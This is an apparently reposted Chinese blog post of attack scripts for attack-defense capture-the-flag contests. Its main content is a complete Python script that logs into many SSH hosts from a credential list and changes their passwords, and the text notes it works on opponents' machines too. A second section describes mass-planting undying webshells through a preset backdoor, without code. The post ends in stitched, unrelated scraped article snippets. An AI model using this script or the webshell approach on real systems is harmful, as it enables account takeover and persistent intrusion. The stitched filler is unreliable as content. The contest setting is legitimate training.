AWD攻防工具脚本汇总(二)

情景五:批量修改ssh密码

拿到官方靶机第一件事改自己机器的ssh密码,当然也可以改别人的密码~

import paramiko
import sys

ssh_clients = []
timeout = 5
new_password = "[email protected]"

def get_flag():
    pass

class SSH_Client():
    def __init__(self, host, port, username, password):
        self.is_root = False
        self.host = host
        self.port = port
        self.username = username
        self.password = password
        self.ssh = paramiko.SSHClient()
        self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        self.ssh.connect(self.host, self.port, self.username, self.password, timeout=timeout)

    def exec_command(self, command):
        stdin, stdout, stderr = self.ssh.exec_command(command)
        return stdin, stdout, stderr

    def change_password(self):
        stdin, stdout, stderr = self.exec_command("passwd")
        if self.username != "root":
            stdin.write("%s\n" % self.password)
        stdin.write("%s\n" % new_password)
        stdin.write("%s\n" % new_password)
        stdout.read()
        if "success" in stderr.read().decode(‘utf-8‘):
            self.password = new_password
            return True
        else:
            return False

    def save_log(self, filename):
        with open(filename, "a+") as f:
            f.write("%s %s %s %s\n" % (self.host, self.port, self.username, self.password))

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage:")
        print("\t python %s [FILENAME]" % (sys.argv[0]))
        exit(1)
    filename = sys.argv[1]
    print(" [+] Loading file : %s" % filename)
    with open(filename) as f:
        for line in f:
            line = line.rstrip("\n")
            data = line.split(" ")
            host = data[0]
            port = int(data[1])
            username = data[2]
            password = data[3]
            print(" [+] Trying login : %s" % host)
            try:
                ssh_client = SSH_Client(host, port, username, password)
            except Exception as e:
                print(" [-] %s" % e)
                continue
            ssh_clients.append(ssh_client)
    print(" [+] Login finished. ")
    print(" [+} Got [%d] clients. " % len(ssh_clients))
    if len(ssh_clients) == 0:
        exit()
    print(" [+] Starting changing password. ")
    for ssh_client in ssh_clients:
        if ssh_client.change_password():
            print(" [+] %s (Success!)" % ssh_client.host)
            ssh_client.save_log("success.log")
        else:
            print(" [+] %s (Failed!)" % ssh_client.host)
    print(" [+] something like interesting!!! ")

情景六:批量种马

审计源码第一件事可能就找到官方的预留后门,开始第一波种马 ,这里用脚本直接用官方的马种不死马

原文地址:https://www.cnblogs.com/-qing-/p/11192479.html

时间: 2024-10-30 08:27:48

AWD攻防工具脚本汇总(二)的相关文章

Python二十九个常见的脚本汇总!

1.冒泡排序2.计算x的n次方的方法3.计算aa + bb + c*c + --4.计算阶乘 n!5.列出当前目录下的所有文件和目录名6.把一个list中所有的字符串变成小写:7.输出某个路径下的所有文件和文件夹的路径8.输出某个路径及其子目录下的所有文件路径9.输出某个路径及其子目录下所有以.html为后缀的文件10.把原字典的键值对颠倒并生产新的字典Python三十个常见的脚本汇总 11.打印九九乘法表通过指定end参数的值,可以取消在末尾输出回车符,实现不换行. 12.替换列表中所有的3为

SecureCrt脚本(二)二级对象之Dialog

SecureCrt脚本(二)二级对象之Dialog SecureCrt脚本 自动化 测试 JS脚本 前言 上篇"SecureCrt 脚本函数(一)"中详细介绍了顶级对象’crt’中的子属性和子方法,本篇中将详细介绍’crt’的子属性’Dialog’的方法.'Dialog’主要是用于Crt构建自己的和用户能够交互的简单界面,比如输入字符,弹出对话框,输出提示框等. 语法 crt.Dialog.Method([arglist]) 方法(Method) 一.FileOpenDialog 解释

        Windows磁盘管理工具Diskpart之二管理动态磁盘

Windows磁盘管理工具Diskpart之二管理动态磁盘 环境:   Window server 2003 SP2英文版   Vmware 7.1.1 目的:   熟悉对动态磁盘进行管理操作,并可以用脚本对动态磁盘进行日常管理. 步骤: (一)diskpart创建动态磁盘的简单卷 .环境如图: 打开cmd进行操作: 查看效果: (二).diskpart创建扩展卷.扩展卷是指把简单卷扩展到同一块磁盘上或不同磁盘上的未分配空间方式,可以增加现有简单卷的大小.(该卷必须未格式化或者使用windows

PHP常见面试题汇总(二)

PHP常见面试题汇总(二) //第51题:统计一维数组中所有值出现的次数?返回一个数组,其元素的键名是原数组的值;键值是该值在原数组中出现的次数 $array=array(4,5,1,2,3,1,2,"a","a"); $ac=array_count_values($array); /** * 输出结果: * Array( *   [4] => 1 *   [5] => 1 *   [1] => 2 *   [2] => 2 *   [3] 

前端常用插件、工具类库汇总(下)

前言 对本文感兴趣可以先加个收藏,也可以转发分享给身边的小伙伴,以后遇到类似的场景就来看看具体的插件及其用法. 上一篇<前端常用插件.工具类库汇总(上)>内容摘要: " 动画库 滚动库 轮播图 滚屏 弹出框 消息通知 下拉框 级联选择器 颜色选择器 时间日期处理 表单验证 分页插件 " >>前端常用插件.工具类库汇总(上) 本篇延续上一篇的内容继续给大家带来一系列关于前端插件.工具类的内容. 富文本编辑器 wangEditor http://www.wanged

shell脚本汇总 2 删除创建时间超过32天的文件

shell脚本汇总 2 删除创建时间超过32天的文件 #!/bin/bash #date:2017-04-11 #version:clear_ballcloud_back_v1.0 #contents: removing the  /www/web/ballcloud_bakck/* , if the file is created above 32 day # cd /www/web #sum the size of already delete directory dirsize=`du -

shell脚本(二)

shell脚本(二)

shell脚本汇总 1 以年月日命名备份文件

shell脚本汇总 1 以年月日命名备份文件 #!/bin/bash # create a back package for mysql of ball and web of ballcloud # # backup mysql for ball and web for ballcloud cd /www/web/backup_ballcloud/ year=`date +%Y ` month=`date +%m ` day=`date +%d ` now=$year-$month-$day #

java中常用的工具类(二)

下面继续分享java中常用的一些工具类,希望给大家带来帮助! 1.FtpUtil Java 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71